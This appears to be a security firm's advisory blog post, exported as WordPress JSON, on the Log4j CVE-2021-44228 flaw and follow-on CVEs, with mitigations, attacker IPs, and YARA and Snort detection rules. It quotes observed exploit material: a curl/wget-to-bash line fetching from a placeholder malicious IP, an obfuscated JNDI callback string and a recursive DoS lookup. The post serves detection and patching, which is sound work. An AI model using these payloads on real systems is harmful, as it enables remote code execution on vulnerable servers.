{"id":4189,"date":"2021-12-13T15:23:11","date_gmt":"2021-12-13T15:23:11","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=4189"},"modified":"2026-06-08T14:54:11","modified_gmt":"2026-06-08T14:54:11","slug":"log4j-how-to-protect-your-systems-cve-2021-44228","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/emerging-threats\/log4j-how-to-protect-your-systems-cve-2021-44228\/","title":{"rendered":"Log4j \u2014 how to protect your systems (CVE-2021-44228)"},"content":{"rendered":"\n<p class=\"text-align:justify wp-block-paragraph\">During the first weeks of <strong>December 2021<\/strong> we observed attacks targeting the <strong>Apache Log4j<\/strong> library. On <strong>2021-12-12<\/strong>, an official security advisory disclosed a critical <strong>Remote Command Execution<\/strong> vulnerability \u2014 <a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-44228\"><code>CVE-2021-44228<\/code><\/a> (<code>T1190<\/code> \u2014 Exploit Public-Facing Application).<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Any <strong>vulnerable system exposed to the public network<\/strong> is to be considered <strong>compromised<\/strong> given the volume of mass-exploitation activity observed worldwide \u2014 confidence high.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">The Apache Software Foundation has released an <strong>emergency security update<\/strong> patching the 0-day; the fixed version is <strong>2.15.0<\/strong>.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Concurrent with the disclosure of <code>CVE-2021-44228<\/code> (Log4j 2), a similar vulnerability was identified in the <strong>1.x<\/strong> branch of the same product, affecting configurations that use the <strong>JMSAppender<\/strong> class. This vulnerability \u2014 <code>CVE-2021-4104<\/code> \u2014 does not depend on user-controlled input but on the deployed configuration.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" \/>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>Update \u2014 2021-12-20<\/strong><\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">New Log4j vulnerabilities have been identified in version <strong>2.15.0<\/strong> (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45046\"><code>CVE-2021-45046<\/code><\/a>) and <strong>2.16.0<\/strong> (<a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-45105\"><code>CVE-2021-45105<\/code><\/a>) \u2014 both shipped as patches for the originally vulnerable 2.14.0. The recommended action is to upgrade directly to <strong>2.17.0<\/strong>, which addresses the security issues observed in the previous releases.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><code>CVE-2021-45046<\/code><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">The patch for <code>CVE-2021-44228<\/code> proved incomplete in non-default configurations. When the logging configuration uses a non-default Pattern Layout containing a <strong>Context Lookup<\/strong> (e.g. <code>$${ctx:loginId}<\/code>), an attacker controlling Thread Context Map (MDC) input can supply a crafted JNDI Lookup pattern, causing \u2014 in some operating environments \u2014 information leakage and <strong>remote code execution<\/strong>, and in all environments local code execution.<br><br>Apache addresses this vulnerability in <strong>Log4j 2.16.0<\/strong>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><code>CVE-2021-45105<\/code><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Log4j versions from <strong>2.0-alpha1<\/strong> through <strong>2.16.0<\/strong> (excluding <strong>2.12.3<\/strong>) do not protect against uncontrolled recursion in self-referential lookups. An attacker controlling Thread Context Map data can trigger a <strong>Denial of Service<\/strong> (DoS) by injecting a crafted recursive expression \u2014 for example: <code>${${::-${::-$${::-j}}}}<\/code><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Apache addresses this vulnerability in <strong>Log4j 2.17.0<\/strong>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-css-opacity\" \/>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter\"><img decoding=\"async\" src=\"https:\/\/images.hothardware.com\/contentimages\/newsitem\/57029\/content\/Apache-Log4j-Logo.png\" alt=\"Apache Log4j Logo\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Detection and Risk Mitigation<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li><a href=\"#Grep\">From application logs<\/a><\/li>\n\n\n\n<li><a href=\"#Yara\">YARA rule<\/a><\/li>\n\n\n\n<li><a href=\"#Snort\">Snort\/Suricata IDS<\/a><\/li>\n\n\n\n<li><a href=\"#mitigation\">Risk mitigation<\/a><\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading has-text-align-center\">Source countries of scanning activity<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Below is an overview of the source IP addresses we observed driving exploitation:<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"1004\" height=\"421\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3.png\" alt=\"\" class=\"wp-image-4190\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3.png 1004w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3-300x126.png 300w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-3-768x322.png 768w\" sizes=\"(max-width: 1004px) 100vw, 1004px\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<h2 class=\"wp-block-heading has-text-align-center\" id=\"h-vulnerability-and-attack-details\">Vulnerability and Attack Details<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">The technical details required to identify, analyse, and mitigate the compromise risk are documented below \u2014 closing the exposure window across heterogeneous Java estates is the kind of structured patch and posture programme delivered by our <a href=\"https:\/\/fortgale.com\/en\/cybersecurity-advisory\/\">Cybersecurity Advisory<\/a>.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Affected Applications<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">A large set of Java-based applications are vulnerable, including:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Elastic Search<\/li>\n\n\n\n<li>Elastic LogStash<\/li>\n\n\n\n<li>GrayLog2<\/li>\n\n\n\n<li>Minecraft (client and server)<\/li>\n\n\n\n<li>Neo4J<\/li>\n\n\n\n<li>Apache projects (Druid, Dubbo, Flink, Flume, Hadoop, Kafka, Solr, Spark, Struts, Tapestry, Wicket)<\/li>\n\n\n\n<li>Prodotti VMware (Horizon, vCenter, vRealize, HCX, NSX-T, UAG, Tanzu)<\/li>\n\n\n\n<li>Grails<\/li>\n\n\n\n<li>Prodotti java custom<\/li>\n\n\n\n<li>Redis<\/li>\n\n\n\n<li>Video games (e.g. Minecraft)<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"h-vulnerability-details\">Vulnerability Details<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">All Apache Log4j2 versions up to 2.14.1 use the <em><strong>Java Naming and Directory Interface<\/strong><\/em> (JNDI) APIs. These features \u2014 used in configuration, log messages, and parameters \u2014 do not guard against LDAP and JNDI endpoints controlled by malicious actors. As a result, an attacker who can influence log messages or their parameters can <strong>execute arbitrary code<\/strong> from an LDAP server whenever Message Lookup Substitution is enabled. <br>To exploit the vulnerability, attackers can send an <strong>HTTP request<\/strong> carrying a specially crafted string that generates a Log4j log entry whose content is then resolved into a JNDI (Java Naming and Directory Interface) request to an attacker-controlled server. <\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Processing of the malicious server&#8217;s response on the vulnerable system executes the code that the attacker has crafted and injected.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"mitigation\">How to mitigate the threat<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">From Log4j <strong>2.15.0<\/strong> onwards, message lookup substitution is disabled by default, which makes upgrading the simplest and most effective fix.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Other possible mitigations include:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In earlier versions, <strong>up to 2.10<\/strong>, this threat can be mitigated by setting the following system properties:\n<ul class=\"wp-block-list\">\n<li><strong>log4j2.formatMsgNoLookups<\/strong> =<strong> <\/strong>true<\/li>\n\n\n\n<li><strong>LOG4J_FORMAT_MSG_NO_LOOKUPS<\/strong>=true<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>In versions <strong>prior to 2.10<\/strong>, it can be mitigated by removing the <strong>JndiLookup<\/strong> class from the classpath:\n<ul class=\"wp-block-list\">\n<li><strong>zip -q -d log4j-core-*.jar org\/apache\/logging\/log4j\/core\/lookup\/JndiLookup.class<\/strong>.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>On <strong>Java 8u121<\/strong>, set:\n<ul class=\"wp-block-list\">\n<li><strong>com.sun.jndi.rmi.object.trustURLCodebase<\/strong> = false<\/li>\n\n\n\n<li><strong>com.sun.jndi.cosnaming.object.trustURLCodebase<\/strong> = false<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Information on ongoing attacks<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>The <strong>jndi<\/strong> interface used to fetch (via a specific protocol: dns, ldap, etc.) the malicious Java object:<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" width=\"359\" height=\"214\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4.png\" alt=\"\" class=\"wp-image-4191\" srcset=\"https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4.png 359w, https:\/\/fortgale.com\/blog\/wp-content\/uploads\/sites\/2\/2021\/12\/image-4-300x179.png 300w\" sizes=\"(max-width: 359px) 100vw, 359px\" loading=\"lazy\" \/><\/figure>\n<\/div>\n\n\n<ul class=\"wp-block-list\">\n<li>All requests carry the malicious payload (often in the <strong>User-Agent<\/strong> or <strong>Referer<\/strong> header)<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Most <em>payloads<\/em> are Base64-encoded:<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>(curl -s &lt;malicious IP&gt;:&lt;Port&gt;\/&lt;victim IP&gt;:&lt;victim Port&gt;||wget -q -O- &lt;malicious IP&gt;:&lt;Port&gt;\/&lt;victim IP&gt;:&lt;victim Port&gt;)|bash<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Observed URIs<\/strong><\/h3>\n\n\n\n<figure class=\"wp-block-table\"><table><tbody><tr><td><strong>URI<\/strong> (useful for detection)<\/td><\/tr><tr><td>\/Basic\/Command\/Base64\/&lt;Base64Code&gt;<\/td><\/tr><tr><td>\/a<\/td><\/tr><tr><td>\/callback<\/td><\/tr><tr><td>\/Exploit<\/td><\/tr><tr><td>\/epepap<\/td><\/tr><tr><td>\/b<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Obfuscation methods<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>${jndi:${lower:l}${lower:d}a${lower:p}:\/\/world80.log4j.bin${upper:a}ryedge.io:80\/callback}<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>Attacker IPs<\/strong><\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>159.65.194.103<\/li>\n\n\n\n<li>159.89.122.19<\/li>\n\n\n\n<li>165.22.213.246<\/li>\n\n\n\n<li>165.227.37.189<\/li>\n\n\n\n<li>167.172.44.255<\/li>\n\n\n\n<li>167.71.13.196<\/li>\n\n\n\n<li>167.99.186.227<\/li>\n\n\n\n<li>176.32.33.14<\/li>\n\n\n\n<li>178.17.174.14<\/li>\n\n\n\n<li>178.62.23.146<\/li>\n\n\n\n<li>195.54.160.149<\/li>\n\n\n\n<li>45.137.21.9<\/li>\n\n\n\n<li>45.155.205.233<\/li>\n\n\n\n<li>61.19.25.207<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading has-text-align-center\">Attack identification<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Grep\">From application logs<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>sudo egrep -I -i -r '\\$(\\{|%7B)jndi:(ldap&#091;s]?|rmi|dns|nis|iiop|corba|nds|http):\/&#091;^\\n]+' \/var\/log\n\n\nsudo find \/var\/log -name \\*.gz -print0 | xargs -0 zgrep -E -i '\\$(\\{|%7B)jndi:(ldap&#091;s]?|rmi|dns|nis|iiop|corba|nds|http):\/&#091;^\\n]+'\n\n\nsudo find \/var\/log\/ -type f -exec sh -c \"cat {} | sed -e 's\/\\${lower:\/\/'g | tr -d '}' | egrep -I -i 'jndi:(ldap&#091;s]?|rmi|dns|nis|iiop|corba|nds|http):'\" \\;\n\n\nsudo find \/var\/log\/ -name '*.gz' -type f -exec sh -c \"zcat {} | sed -e 's\/\\${lower:\/\/'g | tr -d '}' | egrep -i 'jndi:(ldap&#091;s]?|rmi|dns|nis|iiop|corba|nds|http):'\" \\;\n\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Yara\">YARA<\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>rule <strong>EXPL_Log4j_CVE_2021_44228_Dec21_Soft<\/strong> {\n   meta:\n      description = \"Detects indicators in server logs that indicate an exploitation attempt of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/h113sdx\/status\/1469010902183661568?s=20\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n      $x1 = \"${jndi:ldap:\/\"\n      $x2 = \"${jndi:rmi:\/\"\n      $x3 = \"${jndi:ldaps:\/\"\n      $x4 = \"${jndi:dns:\/\"\n   condition:\n      1 of them\n}\n\n\nrule <strong>EXPL_Log4j_CVE_2021_44228_Dec21_Hard<\/strong> {\n   meta:\n      description = \"Detects indicators in server logs that indicate the exploitation of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/h113sdx\/status\/1469010902183661568?s=20\"\n      date = \"2021-12-10\"\n      score = 80\n   strings:\n$x1 = \/${jndi:(ldap|ldaps|rmi|dns):\/&#091;\/]? &#091;a-z-.0-9] {3,120}:&#091;0-9]{2,5}\/&#091;a-zA-Z.] {1,32}} \/\n$fp1r = \/(ldap|rmi|ldaps|dns):\/&#091;\/]? (127.0.0.1|192.168.| 172.&#091;1-3]&#091;0-9].| 10.)\/\n   condition:\n      $x1 and not 1 of ($fp*)\n}\n\n\nrule <strong>SUSP_Base64_Encoded_Exploit_Indicators_Dec21<\/strong> {\n   meta:\n      description = \"Detects base64 encoded strings found in payloads of exploits against log4j CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/Reelix\/status\/1469327487243071493\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n      \/* curl -s  *\/\n      $sa1 = \"Y3VybCAtcy\"\n      $sa2 = \"N1cmwgLXMg\"\n      $sa3 = \"jdXJsIC1zI\"\n      \/* |wget -q -O-  *\/\n      $sb1 = \"fHdnZXQgLXEgLU8tI\"\n      $sb2 = \"x3Z2V0IC1xIC1PLS\"\n      $sb3 = \"8d2dldCAtcSAtTy0g\"\n   condition:\n      1 of ($sa*) and 1 of ($sb*)\n}\n\n\nrule <strong>SUSP_JDNIExploit_Indicators_Dec21<\/strong> {\n   meta:\n      description = \"Detects indicators of JDNI usage in log files and other payloads\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/github.com\/flypig5211\/JNDIExploit\"\n      date = \"2021-12-10\"\n      score = 70\n   strings:\n$xr1 = \/ldap:\/\/&#091;a-zA-Z0-9.] {7,80}:&#091;0-9]{2, 5}\/(Basic\/Command\/Base64| Basic\/ReverseShell| Basic\/TomcatMemshell| Basic\/JBossMemshell| Basic\/WebsphereMemshell| Basic\/SpringMemshell| Basic\/Command| Deserialization\/CommonsCollectionsK| Deserialization\/CommonsBeanutils| Deserialization\/Jre8u20\/TomcatMemshell| Deserialization\/CVE_2020_2555\/WeblogicMemshell| TomcatBypass| GroovyBypass| WebsphereBypass)\/\/\n   condition:\n      filesize &lt; 100MB and $xr1\n}\n\n\nrule <strong>SUSP_EXPL_OBFUSC_Dec21_1<\/strong>{\n   meta:\n      description = \"Detects obfuscation methods used to evade detection in log4j exploitation attempt of CVE-2021-44228\"\n      author = \"Florian Roth\"\n      reference = \"https:\/\/twitter.com\/testanull\/status\/1469549425521348609\"\n      date = \"2021-12-11\"\n      score = 60\n   strings:\n      \/* ${lower:X} - single character match *\/\n      $ = { 24 7B 6C 6F 77 65 72 3A ?? 7D }\n      \/* ${upper:X} - single character match *\/\n      $ = { 24 7B 75 70 70 65 72 3A ?? 7D }\n      \/* URL encoded lower - obfuscation in URL *\/\n      $ = \"$%7blower:\"\n      $ = \"$%7bupper:\"\n      $ = \"%24%7bjndi:\"\n      $ = \"\/$%7bjndi:\"\n   condition:\n      1 of them\n}\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"Snort\">Intrusion Detection: Snort\/Suricata <\/h3>\n\n\n\n<pre class=\"wp-block-code\"><code>alert http any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http ldap)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034647; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http rmi)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034648; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp ldap)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034649; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp rmi)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034650; rev:1; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp rmi)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|rmi|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034652; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp ldap)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|ldap|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034651; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp dns)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034653; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp dns)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034654; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http dns)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|dns|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034655; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert udp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (udp ldaps)<\/strong> (CVE-2021-44228)\"; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034656; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert tcp any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (tcp ldaps)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034657; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n\n\nalert http any any -&gt; &#091;$HOME_NET,$HTTP_SERVERS] any (msg:\"<strong>ET EXPLOIT Apache log4j RCE Attempt (http ldaps)<\/strong> (CVE-2021-44228)\"; flow:established,to_server; content:\"|24 7b|jndi|3a|ldaps|3a 2f 2f|\"; nocase; fast_pattern; reference:url,lunasec.io\/docs\/blog\/log4j-zero-day\/; reference:cve,2021-44228; classtype:attempted-admin; sid:2034658; rev:2; metadata:attack_target Server, created_at 2021_12_10, cve CVE_2021_44228, deployment Perimeter, deployment Internal, former_category EXPLOIT, signature_severity Major, tag Exploit, updated_at 2021_12_10;)\n<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>ATTACK PAYLOAD<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/gist.github.com\/nathanqthai\/01808c569903f41a52e7e7b575caa890\">https:\/\/gist.github.com\/nathanqthai\/01808c569903f41a52e7e7b575caa890<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>C2 DOMAIN NAME<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/gist.github.com\/superducktoes\/9b742f7b44c71b4a0d19790228ce85d8\">https:\/\/gist.github.com\/superducktoes\/9b742f7b44c71b4a0d19790228ce85d8<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\"><strong>ATTACK IP<\/strong><\/h3>\n\n\n\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/gist.github.com\/gnremy\/c546c7911d5f876f263309d7161a7217\">https:\/\/gist.github.com\/gnremy\/c546c7911d5f876f263309d7161a7217<\/a><\/p>\n\n\n\n<p class=\"wp-block-paragraph\"><\/p>\n\n\n\n<p class=\"has-text-align-center wp-block-paragraph\"><strong><a href=\"https:\/\/fortgale.com\/en\/services\/\">Learn about Fortgale services<\/a><\/strong><\/p>\n\n\n\n<p class=\"has-text-align-center wp-block-paragraph\"><strong><a href=\"https:\/\/fortgale.com\/en\/contact\/\">Contact us<\/a><\/strong><\/p>\n","protected":false},"excerpt":{"rendered":"<p>During the first weeks of December 2021 we observed attacks targeting the Apache Log4j library. On 2021-12-12, an official security advisory disclosed a critical Remote Command Execution vulnerability \u2014 CVE-2021-44228 (T1190 \u2014 Exploit Public-Facing Application). Any vulnerable system exposed to the public network is to be considered compromised given the volume of mass-exploitation activity observed &#8230; <a title=\"Log4j \u2014 how to protect your systems (CVE-2021-44228)\" class=\"read-more\" href=\"https:\/\/fortgale.com\/blog\/emerging-threats\/log4j-how-to-protect-your-systems-cve-2021-44228\/\" aria-label=\"Read more about Log4j \u2014 how to protect your systems (CVE-2021-44228)\">Read more<\/a><\/p>\n","protected":false},"author":7,"featured_media":4190,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[1545,1547,1549,1551,1495],"class_list":["post-4189","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-emerging-threats","tag-apache-it","tag-cve-2021-44228-it","tag-log4j-it","tag-rce-it","tag-vulnerability-it"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=4189"}],"version-history":[{"count":32,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189\/revisions"}],"predecessor-version":[{"id":9817,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/4189\/revisions\/9817"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media\/4190"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=4189"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=4189"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=4189"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}